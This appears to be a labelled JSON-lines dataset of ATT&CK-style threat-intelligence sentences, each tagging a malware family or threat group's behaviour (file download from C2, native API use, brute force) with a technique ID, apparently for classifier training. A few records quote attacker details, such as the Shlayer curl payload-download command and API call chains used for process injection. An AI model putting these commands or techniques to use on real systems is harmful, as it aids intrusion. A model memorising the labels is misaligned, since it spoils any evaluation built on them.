{"text1":"HAFNIUM has downloaded malware and tools--including Nishang and PowerCat--onto a compromised host.","labels":"['T1105']"}
{"text1":"HAWKBALL has downloaded additional files from the C2.","labels":"['T1105']"}
{"text1":"HTTPBrowser is capable of writing a file to the compromised system from the C2 server.","labels":"['T1105']"}
{"text1":"Hancitor has the ability to download additional files from C2.","labels":"['T1105']"}
{"text1":"Helminth can download additional files.","labels":"['T1105']"}
{"text1":"HiddenWasp downloads a tar compressed archive from a download server to the system.","labels":"['T1105']"}
{"text1":"Hikit has the ability to download files to a compromised host.","labels":"['T1105']"}
{"text1":"Hildegard has downloaded additional scripts that build and run Monero cryptocurrency miners.","labels":"['T1105']"}
{"text1":"HotCroissant has the ability to upload a file from the command and control (C2) server to the victim machine.","labels":"['T1105']"}
{"text1":"Hydraq creates a backdoor through which remote attackers can download files and additional malware components.","labels":"['T1105']"}
{"text1":"HyperBro has the ability to download additional files.","labels":"['T1105']"}
{"text1":"IcedID has the ability to download additional modules and a configuration file from C2.","labels":"['T1105']"}
{"text1":"IndigoZebra has downloaded additional files and tools from its C2 server.","labels":"['T1105']"}
{"text1":"Indrik Spider has downloaded additional scripts, malware, and tools onto a compromised host.","labels":"['T1105']"}
{"text1":"InvisiMole can upload files to the victim's machine for operations.","labels":"['T1105']"}
{"text1":"Ixeshe can download and execute additional files.","labels":"['T1105']"}
{"text1":"JPIN can download files and upgrade itself.","labels":"['T1105']"}
{"text1":"Javali can download payloads from remote C2 servers.","labels":"['T1105']"}
{"text1":"KEYMARBLE can upload files to the victim\u2019s machine and can download additional payloads.","labels":"['T1105']"}
{"text1":"KOCTOPUS has executed a PowerShell command to download a file to the system.","labels":"['T1105']"}
{"text1":"KONNI can download files and execute them on the victim\u2019s machine.","labels":"['T1105']"}
{"text1":"Kasidet has the ability to download and execute additional files.","labels":"['T1105']"}
{"text1":"Kazuar downloads additional plug-ins to load on the victim\u2019s machine, including the ability to upgrade and replace its own binary.","labels":"['T1105']"}
{"text1":"Ke3chang has used tools to download files to compromised machines.","labels":"['T1105']"}
{"text1":"Kessel can download additional modules from the C2 server.","labels":"['T1105']"}
{"text1":"Kevin can download files to the compromised host.","labels":"['T1105']"}
{"text1":"KeyBoy has a download and upload functionality.","labels":"['T1105']"}
{"text1":"Kinsing has downloaded additional lateral movement scripts from C2.","labels":"['T1105']"}
{"text1":"Kwampirs downloads additional files from C2 servers.","labels":"['T1105']"}
{"text1":"LOWBALL uses the Dropbox API to request two files, one of which is the same file as the one dropped by the malicious email attachment. This is most likely meant to be a mechanism to update the compromised host with a new version of the LOWBALL malware.","labels":"['T1105']"}
{"text1":"Lazarus Group has downloaded files, malware, and tools from its C2 onto a compromised host.","labels":"['T1105']"}
{"text1":"LazyScripter had downloaded additional tools to a compromised host.","labels":"['T1105']"}
{"text1":"Leviathan has downloaded additional scripts and files from adversary-controlled servers.","labels":"['T1105']"}
{"text1":"LitePower has the ability to download payloads containing system commands to a compromised host.","labels":"['T1105']"}
{"text1":"LoudMiner used SCP to update the miner from the C2.","labels":"['T1105']"}
{"text1":"Lucifer can download and execute a replica of itself using certutil.","labels":"['T1105']"}
{"text1":"MCMD can upload additional files to a compromised host.","labels":"['T1105']"}
{"text1":"MacMa has downloaded additional files, including an exploit for used privilege escalation.","labels":"['T1105']"}
{"text1":"Machete can download additional files for execution on the victim\u2019s machine.","labels":"['T1105']"}
{"text1":"MarkiRAT can download additional files and tools from its C2 server, including through the use of BITSAdmin.","labels":"['T1105']"}
{"text1":"MechaFlounder has the ability to upload and download files to and from a compromised host.","labels":"['T1105']"}
{"text1":"Melcoz has the ability to download additional files to a compromised host.","labels":"['T1105']"}
{"text1":"Metamorfo has used MSI files to download additional files to execute.","labels":"['T1105']"}
{"text1":"Milan has received files from C2 and stored them in log folders beginning with the character sequence `a9850d2f`.","labels":"['T1105']"}
{"text1":"MiniDuke can download additional encrypted backdoors onto the victim via GIF files.","labels":"['T1105']"}
{"text1":"Mis-Type has downloaded additional malware and files onto a compromised host.","labels":"['T1105']"}
{"text1":"Misdat is capable of downloading files from the C2.","labels":"['T1105']"}
{"text1":"Mivast has the capability to download and execute .exe files.","labels":"['T1105']"}
{"text1":"MobileOrder has a command to download a file from the C2 server to the victim mobile device's SD card.","labels":"['T1105']"}
{"text1":"MoleNet can download additional payloads from the C2.","labels":"['T1105']"}
{"text1":"Molerats used executables to download malicious files from different sources.","labels":"['T1105']"}
{"text1":"Mongall can download files to targeted systems.","labels":"['T1105']"}
{"text1":"More_eggs can download and launch additional payloads.","labels":"['T1105']"}
{"text1":"Moses Staff has downloaded and installed web shells to following path \"C:\\inetpub\\wwwroot\\aspnet_client\\system_web\\IISpool.aspx\".","labels":"['T1105']"}
{"text1":"Mosquito can upload and download files to the victim.","labels":"['T1105']"}
{"text1":"MuddyWater has used malware that can upload additional files to the victim\u2019s machine.","labels":"['T1105']"}
{"text1":"Mustang Panda has downloaded additional executables following the initial infection stage.","labels":"['T1105']"}
{"text1":"NDiskMonitor can download and execute a file from given URL.","labels":"['T1105']"}
{"text1":"NETWIRE can downloaded payloads from C2 to the compromised host.","labels":"['T1105']"}
{"text1":"NOKKI has downloaded a remote module for execution.","labels":"['T1105']"}
{"text1":"NanoCore has the capability to download and activate additional modules for execution.","labels":"['T1105']"}
{"text1":"Nebulae can download files from C2.","labels":"['T1105']"}
{"text1":"Neoichor can download additional files onto a compromised host.","labels":"['T1105']"}
{"text1":"Nidiran can download and execute files.","labels":"['T1105']"}
{"text1":"Nomadic Octopus has used malicious macros to download additional files to the victim's machine.","labels":"['T1105']"}
{"text1":"OSX\/Shlayer can download payloads, and extract bytes from files. OSX\/Shlayer uses the \"curl -fsL \"$url\" >$tmp_path\" command to download malicious payloads into a temporary directory.","labels":"['T1105']"}
{"text1":"OSX_OCEANLOTUS.D has a command to download and execute a file on the victim\u2019s machine.","labels":"['T1105']"}
{"text1":"OilRig can download remote files onto victims.","labels":"['T1105']"}
{"text1":"Operation Wocao can download additional files to the infected system.","labels":"['T1105']"}
{"text1":"Operators deploying Netwalker have used psexec and certutil to retrieve the Netwalker payload.","labels":"['T1105', 'T1569.002']"}
{"text1":"Orz can download files onto the victim.","labels":"['T1105']"}
{"text1":"OutSteel can download files from its C2 server.","labels":"['T1105']"}
{"text1":"P.A.S. Webshell can upload and download files to and from compromised hosts.","labels":"['T1105']"}
{"text1":"P8RAT can download additional payloads to a target system.","labels":"['T1105']"}
{"text1":"PLAINTEE has downloaded and executed additional plugins.","labels":"['T1105']"}
{"text1":"PLATINUM has transferred files using the Intel\u00ae Active Management Technology (AMT) Serial-over-LAN (SOL) channel.","labels":"['T1105']"}
{"text1":"POSHSPY downloads and executes additional PowerShell code and Windows binaries.","labels":"['T1105']"}
{"text1":"POWERSOURCE has been observed being used to download TEXTMATE and the Cobalt Strike Beacon payload onto victims.","labels":"['T1105']"}
{"text1":"POWERSTATS can retrieve and execute additional PowerShell payloads from the C2 server.","labels":"['T1105']"}
{"text1":"POWRUNER can download or upload files from its C2 server.","labels":"['T1105']"}
{"text1":"Pasam creates a backdoor through which remote attackers can upload files.","labels":"['T1105']"}
{"text1":"Penquin can execute the command code \"do_download\" to retrieve remote files from C2.","labels":"['T1105']"}
{"text1":"Peppy can download and execute remote files.","labels":"['T1105']"}
{"text1":"PipeMon can install additional modules via C2 commands.","labels":"['T1105']"}
{"text1":"Pisloader has a command to upload a file to the victim machine.","labels":"['T1105']"}
{"text1":"PlugX has a module to download and execute files on the compromised machine.","labels":"['T1105']"}
{"text1":"PoisonIvy creates a backdoor through which remote attackers can upload files.","labels":"['T1105']"}
{"text1":"PolyglotDuke can retrieve payloads from the C2 server.","labels":"['T1105']"}
{"text1":"Pony can download additional files onto the infected system.","labels":"['T1105']"}
{"text1":"PowerDuke has a command to download a file.","labels":"['T1105']"}
{"text1":"PowerLess can download additional payloads to a compromised host.","labels":"['T1105']"}
{"text1":"PowerPunch can download payloads from adversary infrastructure.","labels":"['T1105']"}
{"text1":"Psylo has a command to download a file to the system from its C2 server.","labels":"['T1105']"}
{"text1":"Pupy can upload and download to\/from a victim machine.","labels":"['T1105']"}
{"text1":"QakBot has the ability to download additional components and malware.","labels":"['T1105']"}
{"text1":"QuietSieve can download and execute payloads on a target host.","labels":"['T1105']"}
{"text1":"RATANKBA uploads and downloads information.","labels":"['T1105']"}
{"text1":"RCSession has the ability to drop additional files to an infected machine.","labels":"['T1105']"}
{"text1":"RDAT can download files via DNS.","labels":"['T1105']"}
{"text1":"REvil can download a copy of itself from an attacker controlled IP address to the victim machine.","labels":"['T1105']"}
{"text1":"RGDoor uploads and downloads files to and from the victim\u2019s machine.","labels":"['T1105']"}
{"text1":"ROKRAT can retrieve additional malicious payloads from its C2 server.","labels":"['T1105']"}
{"text1":"RTM can download additional files.","labels":"['T1105']"}
{"text1":"RainyDay can download files to a compromised host.","labels":"['T1105']"}
{"text1":"Rancor has downloaded additional malware, including by using certutil.","labels":"['T1105']"}
{"text1":"RedLeaves is capable of downloading a file from a specified URL.","labels":"['T1105']"}
{"text1":"RegDuke can download files from C2.","labels":"['T1105']"}
{"text1":"Remcos can upload and download files to and from the victim\u2019s machine.","labels":"['T1105']"}
{"text1":"RemoteUtilities can upload and download files to and from a target machine.","labels":"['T1105']"}
{"text1":"Revenge RAT has the ability to upload and download files.","labels":"['T1105']"}
{"text1":"RogueRobin can save a new file to the system from the C2 server.","labels":"['T1105']"}
{"text1":"S-Type can download additional files onto a compromised host.","labels":"['T1105']"}
{"text1":"SDBbot has the ability to download a DLL from C2 to a compromised host.","labels":"['T1105']"}
{"text1":"SHUTTERSPEED can download and execute an arbitary executable.","labels":"['T1105']"}
{"text1":"SILENTTRINITY can load additional files and tools, including Mimikatz.","labels":"['T1105']"}
{"text1":"SLOTHFULMEDIA has downloaded files onto a victim machine.","labels":"['T1105']"}
{"text1":"SLOWDRIFT downloads additional payloads.","labels":"['T1105']"}
{"text1":"SMOKEDHAM has used Powershell to download UltraVNC and Ngrok from third-party file sharing sites.","labels":"['T1105']"}
{"text1":"SUNBURST delivered different payloads, including TEARDROP in at least one instance.","labels":"['T1105']"}
{"text1":"Saint Bot can download additional files onto a compromised host.","labels":"['T1105']"}
{"text1":"Sakula has the capability to download files.","labels":"['T1105']"}
{"text1":"SeaDuke is capable of uploading and downloading files.","labels":"['T1105']"}
{"text1":"Seasalt has a command to download additional files.","labels":"['T1105']"}
{"text1":"ServHelper may download additional files to execute.","labels":"['T1105']"}
{"text1":"Seth-Locker has the ability to download and execute files on a compromised host.","labels":"['T1105']"}
{"text1":"Shamoon can download an executable to run on the victim.","labels":"['T1105']"}
{"text1":"Shark  can download additional files from its C2 via HTTP or DNS.","labels":"['T1105']"}
{"text1":"SharpStage has the ability to download and execute additional payloads via a DropBox API.","labels":"['T1105']"}
{"text1":"Sharpshooter downloaded additional payloads after a target was infected with a first-stage downloader.","labels":"['T1105']"}
{"text1":"ShimRat can download additional files.","labels":"['T1105']"}
{"text1":"ShimRatReporter had the ability to download additional payloads.","labels":"['T1105']"}
{"text1":"Sibot can download and execute a payload onto a compromised system.","labels":"['T1105']"}
{"text1":"SideCopy has delivered trojanized executables via spearphishing emails that contacts actor-controlled servers to download malicious payloads.","labels":"['T1105']"}
{"text1":"SideTwist has the ability to download additional files.","labels":"['T1105']"}
{"text1":"Sidewinder has used LNK files to download remote files to the victim's network.","labels":"['T1105']"}
{"text1":"Silence has downloaded additional modules and malware to victim\u2019s machines.","labels":"['T1105']"}
{"text1":"Skidmap has the ability to download files on an infected host.","labels":"['T1105']"}
{"text1":"Sliver can upload files from the C2 server to the victim machine using the \"upload\" command.","labels":"['T1105']"}
{"text1":"Small Sieve has the ability to download files.","labels":"['T1105']"}
{"text1":"SodaMaster has the ability to download additional payloads from C2 to the targeted system.","labels":"['T1105']"}
{"text1":"SpeakUp downloads and executes additional files from a remote server.","labels":"['T1105']"}
{"text1":"SpicyOmelette can download malicious files from threat actor controlled AWS URL's.","labels":"['T1105']"}
{"text1":"Squirrelwaffle has downloaded and executed additional encoded payloads.","labels":"['T1105']"}
{"text1":"StoneDrill has downloaded and dropped temporary files containing scripts; it additionally has a function to upload files from the victims machine.","labels":"['T1105']"}
{"text1":"StrifeWater can download updates and auxiliary modules.","labels":"['T1105']"}
{"text1":"StrongPity can download files to specified targets.","labels":"['T1105']"}
{"text1":"SysUpdate has the ability to download files to a compromised host.","labels":"['T1105']"}
{"text1":"TA505 has downloaded additional malware to execute on victim systems.","labels":"['T1105']"}
{"text1":"TA551 has retrieved DLLs and installer binaries for malware execution from C2.","labels":"['T1105']"}
{"text1":"TAINTEDSCRIBE can download additional modules from its C2 server.","labels":"['T1105']"}
{"text1":"TSCookie has the ability to upload and download files to and from the infected host.","labels":"['T1105']"}
{"text1":"TURNEDUP is capable of downloading additional files.","labels":"['T1105']"}
{"text1":"TYPEFRAME can upload and download files to the victim\u2019s machine.","labels":"['T1105']"}
{"text1":"Taidoor has downloaded additional files onto a compromised host.","labels":"['T1105']"}
{"text1":"TeamTNT has the \"curl\" and \"wget\" commands as well as batch scripts to download new tools.","labels":"['T1105']"}
{"text1":"The Ritsol backdoor trojan used by Elderwood can download files onto a compromised host from a remote location.","labels":"['T1105']"}
{"text1":"The Winnti for Windows dropper can place malicious payloads on targeted systems.","labels":"['T1105']"}
{"text1":"ThiefQuest can download and execute payloads in-memory or from disk.","labels":"['T1105']"}
{"text1":"Threat Group-3390 has downloaded additional malware and tools, including through the use of `certutil`, onto a compromised host .","labels":"['T1105']"}
{"text1":"ThreatNeedle can download additional tools to enable lateral movement.","labels":"['T1105']"}
{"text1":"TinyTurla has the ability to act as a second-stage dropper used to infect the system with additional malware.","labels":"['T1105']"}
{"text1":"Tomiris can download files and execute them on a victim's system.","labels":"['T1105']"}
{"text1":"Tonto Team has downloaded malicious DLLs which served as a ShadowPad loader.","labels":"['T1105']"}
{"text1":"TrickBot downloads several additional files and saves them to the victim's machine.","labels":"['T1105']"}
{"text1":"Trojan.Karagany can upload, download, and execute files on the victim.","labels":"['T1105']"}
{"text1":"Tropic Trooper has used a delivered trojan to download additional files.","labels":"['T1105']"}
{"text1":"UBoatRAT can upload and download files to the victim\u2019s machine.","labels":"['T1105']"}
{"text1":"Unknown Logger is capable of downloading remote files.","labels":"['T1105']"}
{"text1":"Ursnif has dropped payload and configuration files to disk. Ursnif has also been used to download and execute additional payloads.","labels":"['T1105']"}
{"text1":"VBShower has the ability to download VBS files to the target computer.","labels":"['T1105']"}
{"text1":"VERMIN can download and upload files to the victim's machine.","labels":"['T1105']"}
{"text1":"Valak has downloaded a variety of modules and payloads to the compromised host, including IcedID and NetSupport Manager RAT-based malware.","labels":"['T1105']"}
{"text1":"Valak has downloaded a variety of modules and payloads to the compromised host, including IcedID and Ursnif.","labels":"['T1105']"}
{"text1":"Vasport can download files.","labels":"['T1105']"}
{"text1":"Volatile Cedar can deploy additional tools.","labels":"['T1105']"}
{"text1":"Volgmer can download remote files and additional payloads to the victim's machine.","labels":"['T1105']"}
{"text1":"WIRTE has downloaded PowerShell code from the C2 server to be executed.","labels":"['T1105']"}
{"text1":"WarzoneRAT can download and execute additional files.","labels":"['T1105']"}
{"text1":"Waterbear can receive and load executables from remote C2 servers.","labels":"['T1105']"}
{"text1":"WellMail can receive data and executable scripts from C2.","labels":"['T1105']"}
{"text1":"Whitefly has the ability to download additional tools from the C2.","labels":"['T1105']"}
{"text1":"Windshift has used tools to deploy additional payloads to compromised hosts.","labels":"['T1105']"}
{"text1":"Winnti Group has downloaded an auxiliary program named ff.exe to infected machines.","labels":"['T1105']"}
{"text1":"XCSSET downloads browser specific AppleScript modules using a constructed URL with the \"curl\" command, \"https:\/\/\" & domain & \"\/agent\/scripts\/\" & moduleName & \".applescript\".","labels":"['T1105']"}
{"text1":"XTunnel is capable of downloading additional files.","labels":"['T1105']"}
{"text1":"YAHOYAH uses HTTP GET requests to download other files that are executed in memory.","labels":"['T1105']"}
{"text1":"ZLib has the ability to download files.","labels":"['T1105']"}
{"text1":"ZeroT can download additional payloads onto the victim.","labels":"['T1105']"}
{"text1":"ZxShell has a command to transfer files from a remote host.","labels":"['T1105']"}
{"text1":"ZxxZ can download and execute additional files.","labels":"['T1105']"}
{"text1":"build_downer has the ability to download files from C2 to the infected host.","labels":"['T1105']"}
{"text1":"can download and execute a second-stage payload.","labels":"['T1105', 'T1105']"}
{"text1":"cmd can be used to copy files to\/from a remotely connected external system.","labels":"['T1105']"}
{"text1":"creates a backdoor through which remote attackers can upload files.","labels":"['T1105', 'T1105']"}
{"text1":"esentutl can be used to copy files from a given URL.","labels":"['T1105']"}
{"text1":"ftp may be abused by adversaries to transfer tools or files from an external system into a compromised environment.","labels":"['T1105']"}
{"text1":"gh0st RAT can download files to the victim\u2019s machine.","labels":"['T1105']"}
{"text1":"menuPass has installed updates and new malware on victims.","labels":"['T1105']"}
{"text1":"njRAT can download files to the victim\u2019s machine.","labels":"['T1105']"}
{"text1":"xCaon has a command to download files to the victim's machine.","labels":"['T1105']"}
{"text1":"APT37 leverages the Windows API calls: VirtualAlloc(), WriteProcessMemory(), and CreateRemoteThread() for process injection.","labels":"['T1106']"}
{"text1":"APT38 has used the Windows API to execute code within a victim's system.","labels":"['T1106']"}
{"text1":"Amadey has used a variety of Windows API calls, including `GetComputerNameA`, `GetUserNameA`, and `CreateProcessA`.","labels":"['T1106']"}
{"text1":"AppleSeed has the ability to use multiple dynamically resolved API calls.","labels":"['T1106']"}
{"text1":"Aria-body has the ability to launch files using \"ShellExecute\".","labels":"['T1106']"}
{"text1":"Attor's dispatcher has used CreateProcessW API for execution.","labels":"['T1106']"}
{"text1":"Avaddon has used the Windows Crypto API to generate an AES key.","labels":"['T1106']"}
{"text1":"BADNEWS has a command to download an .exe and execute it via CreateProcess API. It can also run with ShellExecute.","labels":"['T1106']"}
{"text1":"BBK has the ability to use the \"CreatePipe\" API to add a sub-process for execution via cmd.","labels":"['T1106']"}
{"text1":"Babuk can use multiple Windows API calls for actions on compromised hosts including discovery and execution.","labels":"['T1106']"}
{"text1":"BackConfig can leverage API functions such as \"ShellExecuteA\" and \"HttpOpenRequestA\" in the process of downloading and executing files.","labels":"['T1106']"}
{"text1":"Bandook has used the ShellExecuteW() function call.","labels":"['T1106']"}
{"text1":"Bankshot creates processes using the Windows API calls: CreateProcessA() and CreateProcessAsUserA().","labels":"['T1106']"}
{"text1":"Bisonal has used the Windows API to communicate with the Service Control Manager to execute a thread.","labels":"['T1106']"}
{"text1":"BitPaymer has used dynamic API resolution to avoid identifiable strings within the binary, including \"RegEnumKeyW\".","labels":"['T1106']"}
{"text1":"BlackTech has used built-in API functions.","labels":"['T1106']"}
{"text1":"BloodHound can use .NET API calls in the SharpHound ingestor component to pull Active Directory data.","labels":"['T1106']"}
{"text1":"BoxCaon has used Windows API calls to obtain information about the compromised host.","labels":"['T1106']"}
{"text1":"Bumblebee can use multiple Native APIs.","labels":"['T1106']"}
{"text1":"CaddyWiper has the ability to dynamically resolve and use APIs, including `SeTakeOwnershipPrivilege`.","labels":"['T1106']"}
{"text1":"Chaes used the \"CreateFileW()\" API function with read permissions to access downloaded payloads.","labels":"['T1106']"}
{"text1":"Chimera has used direct Windows system calls by leveraging Dumpert.","labels":"['T1106']"}
{"text1":"Chrommme can use Windows API including `WinExec` for execution.","labels":"['T1106']"}
{"text1":"Clop has used built-in API functions such as WNetOpenEnumW(), WNetEnumResourceW(), WNetCloseEnum(), GetProcAddress(), and VirtualAlloc().","labels":"['T1106']"}
{"text1":"Cobalt Strike's \"beacon\" payload is capable of running shell commands without \"cmd.exe\" and PowerShell commands without \"powershell.exe\"","labels":"['T1106']"}
{"text1":"ComRAT can load a PE file from memory or the file system and execute it with \"CreateProcessW\".","labels":"['T1106']"}
{"text1":"Conti has used API calls during execution.","labels":"['T1106']"}
{"text1":"Cuba has used several built-in API functions for discovery like GetIpNetTable and NetShareEnum.","labels":"['T1106']"}
{"text1":"Denis used the \"IsDebuggerPresent\", \"OutputDebugString\", and \"SetLastError\" APIs to avoid debugging. Denis used \"GetProcAddress\" and \"LoadLibrary\" to dynamically resolve APIs. Denis also used the \"Wow64SetThreadContext\" API as part of a process hollowing process.","labels":"['T1106']"}
{"text1":"Diavol has used several API calls like `GetLogicalDriveStrings`, `SleepEx`, `SystemParametersInfoAPI`, `CryptEncrypt`, and others to execute parts of its attack.","labels":"['T1106']"}
{"text1":"Donut code modules use various API functions to load and inject code.","labels":"['T1106']"}
{"text1":"Dridex has used the \"OutputDebugStringW\" function to avoid malware analysis as part of its anti-debugging technique.","labels":"['T1106']"}
{"text1":"During Operation Honeybee, the threat actors deployed malware that used API calls, including `CreateProcessAsUser`.","labels":"['T1106']"}
{"text1":"During Operation Wocao, threat actors used the `CreateProcessA` and `ShellExecute` API functions to launch commands after being injected into a selected process.","labels":"['T1106']"}
{"text1":"Egregor has used the Windows API to make detection more difficult.","labels":"['T1106']"}
{"text1":"Empire contains a variety of enumeration modules that have an option to use API calls to carry out tasks.","labels":"['T1106']"}
{"text1":"EvilBunny has used various API calls as part of its checks to see if the malware is running in a sandbox.","labels":"['T1106']"}
{"text1":"Explosive has a function to call the OpenClipboard wrapper.","labels":"['T1106']"}
{"text1":"Flagpro can use Native API to enable obfuscation including `GetLastError` and `GetTickCount`.","labels":"['T1106']"}
{"text1":"FoggyWeb's loader can use API functions to load the FoggyWeb backdoor into the same Application Domain within which the legitimate AD FS managed code is executed.","labels":"['T1106']"}
{"text1":"FunnyDream can use Native API for defense evasion, discovery, and collection.","labels":"['T1106']"}
{"text1":"Gamaredon Group malware has used \"CreateProcess\" to launch additional malicious components.","labels":"['T1106']"}
{"text1":"Gelsemium has the ability to use various Windows API functions to perform tasks.","labels":"['T1106']"}
{"text1":"GoldenSpy can execute remote commands in the Windows command shell using the \"WinExec()\" API.","labels":"['T1106']"}
{"text1":"Goopy has the ability to  enumerate the infected system's user name via \"GetUserNameW\".","labels":"['T1106']"}
{"text1":"Gorgon Group malware can leverage the Windows API call, CreateProcessA(), for execution.","labels":"['T1106']"}
{"text1":"Grandoreiro can execute through the \"WinExec\" API.","labels":"['T1106']"}
{"text1":"GrimAgent can use Native API including \"GetProcAddress\" and \"ShellExecuteW\".","labels":"['T1106']"}
{"text1":"GuLoader can use a number of different APIs for discovery and execution.","labels":"['T1106']"}
{"text1":"HAWKBALL has leveraged several Windows API calls to create processes, gather disk information, and detect debugger activity.","labels":"['T1106']"}
{"text1":"Hancitor has used \"CallWindowProc\" and \"EnumResourceTypesA\" to interpret and execute shellcode.","labels":"['T1106']"}
{"text1":"HermeticWiper can call multiple Windows API functions used for privilege escalation, service execution, and to overwrite random bites of data.","labels":"['T1106']"}
{"text1":"Higaisa has called various native OS APIs.","labels":"['T1106']"}
{"text1":"HotCroissant can perform dynamic DLL importing and API lookups using \"LoadLibrary\" and \"GetProcAddress\" on obfuscated strings.","labels":"['T1106']"}
{"text1":"HyperBro has the ability to run an application (\"CreateProcessW\") or script\/file (\"ShellExecuteW\") via API.","labels":"['T1106']"}
{"text1":"HyperStack can use Windows API's \"ConnectNamedPipe\" and \"WNetAddConnection2\" to detect incoming connections and connect to remote shares.","labels":"['T1106']"}
{"text1":"IcedID has called \"ZwWriteVirtualMemory\", \"ZwProtectVirtualMemory\", \"ZwQueueApcThread\", and \"NtResumeThread\" to inject itself into a remote process.","labels":"['T1106']"}
{"text1":"InvisiMole can use winapiexec tool for indirect execution of  \"ShellExecuteW\" and \"CreateProcessA\".","labels":"['T1106']"}
{"text1":"KOCTOPUS can use the `LoadResource` and `CreateProcessW` APIs for execution.","labels":"['T1106']"}
{"text1":"KillDisk has called the Windows API to retrieve the hard disk handle and shut down the machine.","labels":"['T1106']"}
{"text1":"Lazarus Group has used the Windows API \"ObtainUserAgentString\" to obtain the User-Agent from a compromised host to connect to a C2 server. Lazarus Group has also used various, often lesser known, functions to perform various types of Discovery and Process Injection.","labels":"['T1106']"}
{"text1":"LightNeuron is capable of starting a process using CreateProcess.","labels":"['T1106']"}
{"text1":"Lizar has used various Windows API functions on a victim's machine.","labels":"['T1106']"}
{"text1":"MacMa has used macOS API functions to perform tasks.","labels":"['T1106']"}
{"text1":"MarkiRAT can run the ShellExecuteW API via the Windows Command Shell.","labels":"['T1106']"}
{"text1":"Metamorfo has used native WINAPI calls.","labels":"['T1106']"}
{"text1":"Milan can use the API `DnsQuery_A` for DNS resolution.","labels":"['T1106']"}
{"text1":"Mis-Type has used Windows API calls, including `NetUserAdd` and `NetUserDel`.","labels":"['T1106']"}
{"text1":"NETWIRE can use Native API including \"CreateProcess\" \"GetProcessById\", and \"WriteProcessMemory\".","labels":"['T1106']"}
{"text1":"Nebulae has the ability to use \"CreateProcess\" to execute a process.","labels":"['T1106']"}
{"text1":"Netwalker can use Windows API functions to inject the ransomware DLL.","labels":"['T1106']"}
{"text1":"PLEAD can use `ShellExecute` to execute applications.","labels":"['T1106']"}
{"text1":"PcShare has used a variety of Windows API functions.","labels":"['T1106']"}
{"text1":"Pillowmint has used multiple native Windows APIs to execute and conduct process injections.","labels":"['T1106']"}
{"text1":"PipeMon's first stage has been executed by a call to \"CreateProcess\" with the decryption password in an argument. PipeMon has used a call to \"LoadLibrary\" to load its installer.","labels":"['T1106']"}
{"text1":"PolyglotDuke can use \"LoadLibraryW\" and \"CreateProcess\" to load and execute code.","labels":"['T1106']"}
{"text1":"Pteranodon has used various API calls.","labels":"['T1106']"}
{"text1":"QakBot can use \"GetProcAddress\" to help delete malicious strings from memory.","labels":"['T1106']"}
{"text1":"RCSession can use WinSock API for communication including \"WSASend\" and \"WSARecv\".","labels":"['T1106']"}
{"text1":"REvil can use Native API for execution and to retrieve active services.","labels":"['T1106']"}
{"text1":"ROKRAT can use a variety of API calls to execute shellcode.","labels":"['T1106']"}
{"text1":"Rising Sun used dynamic API resolutions to various Windows APIs by leveraging `LoadLibrary()` and `GetProcAddress()`.","labels":"['T1106']"}
{"text1":"SILENTTRINITY has the ability to leverage API including `GetProcAddress` and `LoadLibrary`.","labels":"['T1106']"}
{"text1":"SUNSPOT used Windows API functions such as \"MoveFileEx\" and \"NtQueryInformationProcess\" as part of the SUNBURST injection process.","labels":"['T1106']"}
{"text1":"Sharpshooter's first-stage downloader resolved various Windows libraries and APIs, including LoadLibraryA(), GetProcAddress(), and CreateProcessA().","labels":"['T1106']"}
{"text1":"ShimRat has used Windows API functions to install the service and shim.","labels":"['T1106']"}
{"text1":"ShimRatReporter used several Windows API functions to gather information from the infected system.","labels":"['T1106']"}
{"text1":"SideCopy has executed malware by calling the API function `CreateProcessW`.","labels":"['T1106']"}
{"text1":"SideTwist can use \"GetUserNameW\", \"GetComputerNameW\", and \"GetComputerNameExW\" to gather information.","labels":"['T1106']"}
{"text1":"Siloscape makes various native API calls.","labels":"['T1106']"}
{"text1":"SodaMaster can use \"RegOpenKeyW\" to access the Registry.","labels":"['T1106']"}
{"text1":"SombRAT has the ability to respawn itself using \"ShellExecuteW\" and \"CreateProcessW\".","labels":"['T1106']"}
{"text1":"Stuxnet uses the SetSecurityDescriptorDacl API to reduce object integrity levels.","labels":"['T1106']"}
{"text1":"SynAck parses the export tables of system DLLs to locate and call various Windows API functions.","labels":"['T1106']"}
{"text1":"The file collection tool used by RainyDay can utilize native API including \"ReadDirectoryChangeW\" for folder monitoring.","labels":"['T1106']"}
{"text1":"ThiefQuest uses various API to perform behaviors such as executing payloads and performing local enumeration.","labels":"['T1106']"}
{"text1":"Torisma has used various Windows API calls.","labels":"['T1106']"}
{"text1":"Turla and its RPC backdoors have used APIs calls for various tasks related to subverting AMSI and accessing then executing commands through RPC and\/or named pipes.","labels":"['T1106']"}
{"text1":"Ursnif has used \"CreateProcessW\" to create child processes.","labels":"['T1106']"}
{"text1":"Volgmer executes payloads using the Windows API call CreateProcessW().","labels":"['T1106']"}
{"text1":"WarzoneRAT can use a variety of API calls on a compromised host.","labels":"['T1106']"}
{"text1":"WastedLocker's custom crypter, CryptOne, leveraged the VirtualAlloc() API function to help execute the payload.","labels":"['T1106']"}
{"text1":"Waterbear can leverage API functions for execution.","labels":"['T1106']"}
{"text1":"WhisperGate has used the `ExitWindowsEx` API to flush file buffers to disk and stop running processes.","labels":"['T1106']"}
{"text1":"WindTail can invoke Apple APIs \"contentsOfDirectoryAtPath\", \"pathExtension\", and (string) \"compare\".","labels":"['T1106']"}
{"text1":"Winnti for Windows can use Native API to create a new process and to start services.","labels":"['T1106']"}
{"text1":"ZxxZ has used API functions such as `Process32First`, `Process32Next`, and `ShellExecuteA`.","labels":"['T1106']"}
{"text1":"build_downer has the ability to use the \"WinExec\" API to execute malware on a compromised host.","labels":"['T1106']"}
{"text1":"menuPass has used native APIs including \"GetModuleFileName\", \"lstrcat\", \"CreateFile\", and \"ReadFile\".","labels":"['T1106']"}
{"text1":"xCaon has leveraged native OS function calls to retrieve  victim's network adapter's  information using GetAdapterInfo() API.","labels":"['T1106']"}
{"text1":"APT34 has used brute force techniques to obtain credentials.","labels":"['T1110']"}
{"text1":"APT38 has used brute force techniques to attempt account access when passwords are unknown or when password hashes are unavailable.","labels":"['T1110']"}
{"text1":"APT39 has used Ncrack to reveal credentials.","labels":"['T1110']"}
{"text1":"Caterpillar WebShell has a module to perform brute force attacks on a system.","labels":"['T1110']"}
{"text1":"Chaos conducts brute force attacks against SSH services to gain initial access.","labels":"['T1110']"}
{"text1":"Dragonfly dropped and executed Hydra, a password cracker.","labels":"['T1110']"}
{"text1":"FIN5 has has used the tool GET2 Penetrator to look for remote login and hard-coded credentials.","labels":"['T1110']"}
{"text1":"Fox Kitten has brute forced RDP credentials.","labels":"['T1110']"}
